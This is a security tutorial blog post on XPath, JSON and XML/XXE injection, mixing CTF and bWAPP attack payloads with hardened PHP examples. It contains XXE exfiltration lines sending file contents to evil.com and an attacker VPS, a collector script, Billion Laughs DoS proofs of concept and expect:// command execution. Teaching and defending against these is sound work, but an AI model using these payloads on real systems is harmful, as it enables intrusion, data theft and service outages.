J0k3r

Code Injection Vulnerabilities

2018-08-09


XPath Injection

When XML is used to store data, much like a database:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<note>
  <to>George</to>
  <from>John</from>
  <heading>Reminder</heading>
  <body>Don't forget the meeting!</body>
</note>
```

XPath is the language used to query that XML.

XPath injection is the injection of malicious query fragments into such a query through unescaped user input.

Here is an example from ichunqiu.

score.xml:

```xml
<?xml version="1.0" encoding="utf-8"?>
<root>
  <class num='1'>
    <peo name='tom'>
      <subject>
        <foo>english</foo>
        <score>60</score>
      </subject>
      <subject>
        <foo>chinese</foo>
        <score>70</score>
      </subject>
      <password>qwer123</password>
    </peo>
    <peo name='helen'>
      <subject>
        <foo>english</foo>
        <score>24</score>
      </subject>
      <subject>
        <foo>chinese</foo>
        <score>34</score>
      </subject>
      <password>woaichishi</password>
    </peo>
    <peo name='vk'>
      <subject>
        <foo>english</foo>
        <score>100</score>
      </subject>
      <subject>
        <foo>chinese</foo>
        <score>100</score>
      </subject>
      <password>vk123</password>
    </peo>
  </class>
</root>
```

score.php:

```php
<?php
if (file_exists('score.xml')) {
    $xml = simplexml_load_file('score.xml'); // load the data from the XML file
    if (isset($_GET['user'])) {
        $user = $_GET['user'];

        // build the queries: $user is spliced in without validation or escaping
        $en_scr = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";
        $ch_scr = "//peo[@name='{$user}']/subject[contains(foo, 'chinese')]/score";

        $en_qu = $xml->xpath($en_scr);
        $ch_qu = $xml->xpath($ch_scr);
        foreach ($en_qu as $key => $value) {
            echo $user . ':<br>english is ' . $value;
        }
        foreach ($ch_qu as $key => $value) {
            echo '<br>' . 'chinese is ' . $value;
        }
    } else {
        echo 'only have three user: vk, tom, helen.';
    }
}
?>
```

`$en_scr = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";` is the XPath expression that selects nodes from the XML.

`//peo[@name='{$user}']` selects every `peo` element, anywhere in the document, whose `name` attribute equals the supplied user.

The `contains()` function then keeps the `subject` children whose `foo` node contains the text `english`.

Once the matching `subject` is found, its `score` child holds the mark.

Because `$user` is spliced into the expression verbatim, a single quote in the input ends the string literal and everything after it is parsed as XPath syntax.

Related techniques are error-based injection through MySQL's `updatexml()` function (a SQL injection technique: the function rejects a malformed XPath expression and leaks the injected value in its error message) and blind XPath injection, where the result is inferred one true/false query at a time.

XPath Injection (Login Form) (bWAPP)

The login check:

```php
$result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']");
```

Close the single quote by entering `q' or '1'='1` in both the Login and Password fields.

The expression becomes `/heroes/hero[login='q' or '1'='1' and password='q' or '1'='1']`. Since `and` binds tighter than `or`, this reads as `login='q' or ('1'='1' and password='q') or '1'='1'`, which is true for every `hero`, so the login succeeds.

Alternatively, enter only `q' or 1=1 or '1'='1` in the Login field; the password can then be anything.

XPath Injection (Search) (bWAPP)

```php
$result = $xml->xpath("//hero[contains(genre, '$genre')]/movie");
```

Entering `')]/password|a[contains(aa,'` as the genre turns the expression into `//hero[contains(genre, '')]/password|a[contains(aa,'')]/movie`. The left side of the `|` union returns every hero's `password` node (an empty string is contained in any genre), the right side matches nothing, so the search results list the passwords.

injection (HCTF 2015)

Source:

```php
<?php
$re = array('and','or','count','select','from','union','group','by','limit','insert','where','order','alter','delete','having','max','min','avg','sum','sqrt','rand','concat','sleep');
// cookie value is base64 for "sqli is not the only way for injection"
setcookie('injection','c3FsaSBpcyBub3QgdGhlIG9ubHkgd2F5IGZvciBpbmplY3Rpb24=',time()+100000);
if (file_exists('t3st.xml')) {
    $xml = simplexml_load_file('t3st.xml');
    $user = $_GET['user'];
    $user = str_replace($re, ' ', $user); // SQL keyword blacklist; irrelevant to XPath syntax
    // $user=str_replace("'", "&apos", $user);
    $query = "user/username[@name='" . $user . "']";

    $ans = $xml->xpath($query);
    foreach ($ans as $x => $x_value) {
        echo $x . ": " . $x_value;
        echo "<br />";
    }
}
?>
```

As with SQL injection, the idea is to close the single quote and the `[]` predicate. `//*` selects every element in the document, and `|` computes the union of two node sets, so the result contains every node rather than just the requested username. The keyword blacklist removes `and`/`or` but never touches `]`, `|` or `*`.

payload: `?user=q%27]|//*|a[%27`

The expression becomes `user/username[@name='q']|//*|a['']`, and the page prints every element in t3st.xml.
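The following is an added example, not code from the original post, that puts the score.php query shape and the HCTF union payload side by side with a hardened version. It runs offline against an inline copy of score.xml (trimmed to two users); the function names, the allow-list pattern and the `xpath_literal()` helper are choices made for this example, not part of either challenge.

```php
<?php
// Added example: the score.php query shape, vulnerable and hardened.
// Not code from the original post. Inline copy of score.xml (two users) so it runs offline.

const SCORE_XML = <<<'XML'
<?xml version="1.0" encoding="utf-8"?>
<root>
  <class num='1'>
    <peo name='tom'>
      <subject><foo>english</foo><score>60</score></subject>
      <subject><foo>chinese</foo><score>70</score></subject>
      <password>qwer123</password>
    </peo>
    <peo name='helen'>
      <subject><foo>english</foo><score>24</score></subject>
      <subject><foo>chinese</foo><score>34</score></subject>
      <password>woaichishi</password>
    </peo>
  </class>
</root>
XML;

// Vulnerable: the user-controlled string is spliced straight into the path,
// exactly as score.php does.
function english_score_vulnerable(SimpleXMLElement $xml, string $user): array
{
    $path = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";
    $nodes = $xml->xpath($path);
    return array_map('strval', $nodes === false ? [] : $nodes);
}

// Hardened, step 1: an allow-list. User names are identifiers, so anything
// else is rejected before it reaches the XPath engine at all.
function is_valid_user(string $user): bool
{
    return preg_match('/^[A-Za-z0-9_]{1,32}$/', $user) === 1;
}

// Hardened, step 2 (for fields that legitimately may contain quotes): build an
// XPath 1.0 string literal. XPath has no escape character, so a value holding
// both quote kinds is split on the single quote and reassembled with concat().
function xpath_literal(string $value): string
{
    if (strpos($value, "'") === false) {
        return "'" . $value . "'";
    }
    if (strpos($value, '"') === false) {
        return '"' . $value . '"';
    }
    $parts = explode("'", $value);
    return "concat('" . implode("', \"'\", '", $parts) . "')";
}

function english_score_hardened(SimpleXMLElement $xml, string $user): array
{
    if (!is_valid_user($user)) {
        return []; // reject outright rather than trying to "clean" the input
    }
    $path = "//peo[@name=" . xpath_literal($user) . "]/subject[contains(foo, 'english')]/score";
    $nodes = $xml->xpath($path);
    return array_map('strval', $nodes === false ? [] : $nodes);
}

$xml = simplexml_load_string(SCORE_XML);

// Normal use: a single score.
print_r(english_score_vulnerable($xml, 'tom'));

// The HCTF payload: close the quote and the predicate, then union in //*. The
// expression becomes //peo[@name='q']|//*|a['']/subject[contains(foo, 'english')]/score
// and the node set is every element in the document, passwords included.
$payload = "q']|//*|a['";
print_r(english_score_vulnerable($xml, $payload));

// Hardened: the allow-list stops the payload before any XPath is built.
print_r(english_score_hardened($xml, $payload));
print_r(english_score_hardened($xml, 'tom'));

// For a field that must accept arbitrary text, xpath_literal() keeps quotes inert.
echo xpath_literal("o'neil\"x"), "\n";
```

Run it with `php xpath_demo.php`. The vulnerable call with `tom` prints one score; with the payload it prints the string value of every element, `qwer123` and `woaichishi` among them. The hardened call prints an empty array for the payload because the allow-list rejects it, still returns `60` for `tom`, and the last line shows the `concat('o', "'", 'neil"x')` form that `xpath_literal()` produces for a value containing both quote kinds.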

See also: XPath syntax; XPath operators.

JSON Injection

JSON

JSON (JavaScript Object Notation) is a syntax for storing and exchanging text-based data, similar to XML.

JSON is hierarchical (values can contain values) and is plain text.

JSON can be parsed with JavaScript.

JSON data can be transferred with AJAX.

Modifying data according to the JSON grammar: given `{"adduser":[{"username":"admin1","password":"123456"}]}`, if the password value is spliced into the document as raw text, supplying `123456"},{"username":"admin2","password":"123456` as the password closes the first object and inserts a second user, `admin2`.
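An added example, not from the original post, that builds the `adduser` document from the text above both ways and counts how many accounts each version would create. The function names are this example's own.

```php
<?php
// Added example (not from the original post): string-built JSON versus json_encode().

// Vulnerable: raw input is pasted into a JSON template.
function build_adduser_concat(string $username, string $password): string
{
    return '{"adduser":[{"username":"' . $username . '","password":"' . $password . '"}]}';
}

// Fixed: the serializer escapes quotes, backslashes and control characters,
// so input can only ever become a string value, never new structure.
function build_adduser_encoded(string $username, string $password): string
{
    $doc = ['adduser' => [['username' => $username, 'password' => $password]]];
    return json_encode($doc, JSON_THROW_ON_ERROR | JSON_UNESCAPED_SLASHES);
}

// Consumer side: decode strictly and count the accounts that would be created.
function count_new_users(string $json): int
{
    $data = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($data['adduser'] ?? null)) {
        throw new UnexpectedValueException('adduser must be a list');
    }
    return count($data['adduser']);
}

// The password from the text: it closes the admin1 object and opens a second one.
$injected = '123456"},{"username":"admin2","password":"123456';

echo "concatenated: ", count_new_users(build_adduser_concat('admin1', $injected)), " account(s)\n";
echo "encoded:      ", count_new_users(build_adduser_encoded('admin1', $injected)), " account(s)\n";
echo build_adduser_encoded('admin1', $injected), "\n";
```

With the concatenated builder the injected password yields a valid document with two accounts, `admin1` and `admin2`. With `json_encode()` the inner quotes are escaped as `\"`, the document still holds exactly one account, and the last line shows the whole injected string sitting harmlessly inside the password field. `JSON_THROW_ON_ERROR` (PHP 7.3+) turns a malformed document into an exception instead of a silent `null`.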

JSON hijacking

A JSON service or interface returns a valuable, sensitive JSON array, for example at `/api/xxx`, and an attacker performs JSON hijacking against that site to obtain it. The classic form is a page under the attacker's control that loads the endpoint with `<script src="https://victim/api/xxx">`: the victim's browser attaches its cookies to the request, and in browsers that let page script intercept the construction of a bare array literal, the attacker's page reads the values out. Current browsers no longer execute a bare JSON array this way, but the usual defences (requiring POST or a custom request header, prefixing the response with a non-executable guard, returning an object rather than a top-level array, `SameSite` cookies, and `X-Content-Type-Options: nosniff`) are still worth applying.
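An added example, not from the original post, of a PHP endpoint that cannot be consumed through a cross-site `<script>` tag. The `serve_json()` and `parse_guarded_json()` names, the `)]}',` guard string and the account record are this example's own constructions.

```php
<?php
// Added example (not from the original post): a JSON endpoint hardened against
// JSON hijacking, modelled as a pure function so it can be exercised offline.

function serve_json(string $method, array $headers, array $data): array
{
    // 1. A cross-origin <script src=...> load is always a GET carrying only
    //    browser-set headers, so require a header that only same-origin
    //    XHR/fetch code can add (or require POST).
    $hdr = array_change_key_case($headers, CASE_LOWER);
    if ($method !== 'POST' && ($hdr['x-requested-with'] ?? '') !== 'XMLHttpRequest') {
        return [403, ['Content-Type' => 'application/json'], '{"error":"forbidden"}'];
    }
    // 2. Wrap the array in an object and prefix an unparseable guard, so the
    //    body is a syntax error as JavaScript; the real client strips it.
    $body = ")]}',\n" . json_encode(['data' => $data], JSON_THROW_ON_ERROR);
    return [200, [
        'Content-Type'           => 'application/json; charset=utf-8',
        'X-Content-Type-Options' => 'nosniff',
        'Cache-Control'          => 'no-store',
    ], $body];
}

// The legitimate client's counterpart (written in PHP here for the demo).
function parse_guarded_json(string $body): array
{
    $guard = ")]}',\n";
    if (strncmp($body, $guard, strlen($guard)) !== 0) {
        throw new UnexpectedValueException('missing anti-hijack prefix');
    }
    return json_decode(substr($body, strlen($guard)), true, 512, JSON_THROW_ON_ERROR);
}

$accounts = [['id' => 1, 'email' => 'alice@example.com']]; // constructed sample record

// A <script src> load: GET with the victim's cookie and nothing else.
[$status] = serve_json('GET', ['Cookie' => 'session=abc'], $accounts);
echo "script-tag load: HTTP $status\n";

// Same-origin XHR with the custom header: served, guard in front.
[$status, , $body] = serve_json('GET', ['X-Requested-With' => 'XMLHttpRequest'], $accounts);
echo "xhr load: HTTP $status\n";
print_r(parse_guarded_json($body)['data']);
```

The first call is refused with 403 because the header is missing, which is exactly the situation a hijacking page is in. The second is served, and even if a legacy browser did execute the body as script, `)]}',` is a syntax error before any array literal is reached. The `nosniff` header additionally stops the response from being reinterpreted as JavaScript.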

XML Injection

For XML itself, my post "XML External Entity attack/XXE攻击 | J0k3r" covers file reading through XXE.

XXE intranet reconnaissance

Port probing (the parser's response time, or the libxml error it raises, differs between an open and a closed port):

```php
<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY port SYSTEM "http://192.168.0.1:80">
]>
<p>&port;</p>
EOF;

$data = simplexml_load_string($xml);
echo "<pre>";
print_r($data);
?>
```

Using parameter entities in a DTD to append the file content to a URL:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root[
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.1.100:8000/evil.dtd">
%dtd;
%send;
]>
<root></root>
```

evil.dtd:

```xml
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://evil.com/?content=%file;'>">
%payload;
```

evil.dtd declares `%send` with the content of `%file` appended to the URL. When the parser resolves `%send;`, it requests that URL, so the base64-encoded file appears in the attacker's web server log (or in Burp). The `&#x25;` is a `%` written as a character reference: a parameter-entity reference inside an entity value in the internal subset is not allowed, which is why the nested declaration lives in the external DTD.

Attacking intranet websites

Use XXE to make the vulnerable server send the payload request to the intranet host.

DoS attack

Billion Laughs attack

In the Billion laughs attack, entity expansion during parsing turns a few hundred bytes of DTD into about a billion copies of a short string, roughly 3 GB of memory.

POC:

```xml
<?xml version = "1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]>
<lolz>&lol9;</lolz>
```

Or a smaller variant:

```xml
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
```

The POC first defines the entity `lol` with the string "lol", then `lol1`, which references `lol` ten times, then `lol2`, which references `lol1` ten times, and so on. By the time `lol9` is referenced inside the `lolz` element, it expands to 10^9 copies of "lol".
If the parser applies no limit while resolving these, the result is a denial of service. libxml2, which PHP's simplexml uses, enforces an entity expansion limit by default; `LIBXML_PARSEHUGE` removes it, so that flag must never be used on untrusted input.

Another payload that can cause denial of service uses a SYSTEM entity that reads `/dev/random`, which never reaches end of file, so the parser blocks for as long as the request is allowed to run.
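The following added example (not from the original post) computes the expansion factor from the internal DTD subset before the document reaches a parser, which is the check a pre-parse filter would perform, and it makes the 10^9 figure above concrete by rebuilding the Billion Laughs DTD and measuring it. The function names and the byte limit are this example's choices; libxml2 keeps its own limit regardless.

```php
<?php
// Added example (not from the original post): estimate how far the general
// entities declared in a document's internal DTD subset expand, before parsing.

function estimate_entity_expansion(string $xml): array
{
    // Only the internal subset is inspected; nothing external is fetched.
    if (!preg_match('/<!DOCTYPE[^\[>]*\[(.*?)\]\s*>/s', $xml, $m)) {
        return ['entities' => 0, 'max_bytes' => 0];
    }
    // General entities with literal values: <!ENTITY name "value"> or 'value'.
    preg_match_all(
        '/<!ENTITY\s+([A-Za-z_:][\w.:-]*)\s+(?:"([^"]*)"|\'([^\']*)\')\s*>/',
        $m[1], $decls, PREG_SET_ORDER
    );
    $values = [];
    foreach ($decls as $d) {
        $values[$d[1]] = $d[2] !== '' ? $d[2] : ($d[3] ?? '');
    }

    $sizes = [];     // memoised expanded size per entity
    $visiting = [];  // recursion guard: XML forbids entity reference loops
    $expanded = function (string $name) use (&$expanded, &$sizes, &$visiting, $values): int {
        if (isset($sizes[$name])) {
            return $sizes[$name];
        }
        if (isset($visiting[$name])) {
            throw new RuntimeException("entity reference loop through &$name;");
        }
        $visiting[$name] = true;
        $value = $values[$name];
        $total = 0;
        $pos = 0;
        // Literal text counts as-is; every &ref; counts as its own expansion.
        while (preg_match('/&([A-Za-z_:][\w.:-]*);/', $value, $r, PREG_OFFSET_CAPTURE, $pos)) {
            $total += $r[0][1] - $pos;
            $ref = $r[1][0];
            $total += isset($values[$ref]) ? $expanded($ref) : strlen($r[0][0]);
            $pos = $r[0][1] + strlen($r[0][0]);
        }
        $total += strlen($value) - $pos;
        unset($visiting[$name]);
        return $sizes[$name] = $total;
    };

    $max = 0;
    foreach (array_keys($values) as $name) {
        $max = max($max, $expanded($name));
    }
    return ['entities' => count($values), 'max_bytes' => $max];
}

// Gate: refuse documents whose largest entity expands past $limit bytes.
function entities_too_large(string $xml, int $limit = 1000000): bool
{
    return estimate_entity_expansion($xml)['max_bytes'] > $limit;
}

// Rebuild the Billion Laughs DTD from above programmatically (nine levels of ten).
$dtd = "<!ENTITY lol \"lol\">\n<!ELEMENT lolz (#PCDATA)>\n";
for ($i = 1; $i <= 9; $i++) {
    $prev = $i === 1 ? 'lol' : 'lol' . ($i - 1);
    $dtd .= "<!ENTITY lol$i \"" . str_repeat("&$prev;", 10) . "\">\n";
}
$lolz = "<?xml version=\"1.0\"?>\n<!DOCTYPE lolz [\n{$dtd}]>\n<lolz>&lol9;</lolz>";

print_r(estimate_entity_expansion($lolz));
var_dump(entities_too_large($lolz));

// A harmless document with one small entity passes the gate.
$benign = '<!DOCTYPE d [<!ENTITY who "world">]><d>hello &who;</d>';
var_dump(entities_too_large($benign));
```

For the rebuilt POC the estimate reports ten entities with `lol9` expanding to 3,000,000,000 bytes (10^9 copies of the three-byte string), so the gate rejects it, while the benign document's five-byte entity passes. The same routine throws on a reference cycle such as `<!ENTITY a "&b;"><!ENTITY b "&a;">` instead of looping, and parameter entities (`<!ENTITY % ...>`) are deliberately not followed because resolving them may mean fetching an external DTD.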

Remote command execution

Requires PHP's expect extension (the `expect://` stream wrapper), which is not installed by default.

```php
<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY ex SYSTEM "expect://whoami">
]>
<p>&ex;</p>
EOF;

$data = simplexml_load_string($xml);
echo "<pre>";
print_r($data);
?>
```

Blind case (no output reflected):

```xml
<!DOCTYPE ANY[
<!ENTITY % r SYSTEM "http://vps/e.xml">
%r;
%all;
%s;
]>
```

e.xml:

```xml
<!ENTITY % f SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">

<!ENTITY % all "<!ENTITY &#x25; s SYSTEM 'http://vps/xxe.php?f=%f;'>">
```

xxe.php (on the attacker's VPS; stores whatever arrives in the query string):

```php
<?php
file_put_contents("flag.txt", $_GET['f']);
?>
```
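An added example, not from the original post, that serves the port-probe, parameter-entity exfiltration, Billion Laughs, `expect://` and blind-exfiltration sections alike: the same `simplexml_load_string()` call in its vulnerable and its hardened configuration. The test document is constructed here and points at a local file so the example runs offline; the function names are this example's own.

```php
<?php
// Added example (not from the original post): simplexml with entity loading on
// versus a hardened configuration. Runs offline; no network access is needed.

// Constructed test document: an external general entity, in the same shape as
// the port-probe and expect:// snippets, but pointed at a local file.
const UNTRUSTED_XML = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<p>&xxe;</p>
XML;

// Vulnerable: LIBXML_NOENT substitutes entity values and LIBXML_DTDLOAD lets
// the parser follow external DTD and entity references.
function parse_vulnerable(string $xml): ?string
{
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);
    return $doc === false ? null : (string) $doc;
}

// Hardened, layer 1: untrusted XML has no business carrying a DOCTYPE at all.
// Rejecting it up front stops every variant on this page (port probing,
// file exfiltration via parameter entities, Billion Laughs, expect://).
function has_doctype(string $xml): bool
{
    return preg_match('/<!DOCTYPE/i', $xml) === 1;
}

// Hardened, layer 2: even if a DOCTYPE slipped through, refuse to resolve any
// external entity, and never pass NOENT, DTDLOAD or PARSEHUGE.
function parse_hardened(string $xml): ?string
{
    if (has_doctype($xml)) {
        return null;
    }
    $previous = libxml_use_internal_errors(true);
    // Process-wide by design: returning null makes every external entity lookup fail.
    // On PHP < 8.0, libxml_disable_entity_loader(true) achieves the same.
    libxml_set_external_entity_loader(static function ($public, $system, $context) {
        return null;
    });
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc === false ? null : (string) $doc;
}

echo "vulnerable:  ", var_export(parse_vulnerable(UNTRUSTED_XML), true), "\n";
echo "hardened:    ", var_export(parse_hardened(UNTRUSTED_XML), true), "\n";
echo "hardened, benign input: ", parse_hardened('<p>hello</p>'), "\n";
```

The vulnerable call prints the machine's hostname, which is the file content substituted into `<p>`; with a `http://` or `expect://` target it would be the port probe or the command instead. The hardened call returns `null` for the same document because the DOCTYPE is rejected, and still parses the benign document. If an application genuinely needs DOCTYPEs, keep layer 2 and the entity-expansion gate and drop only layer 1.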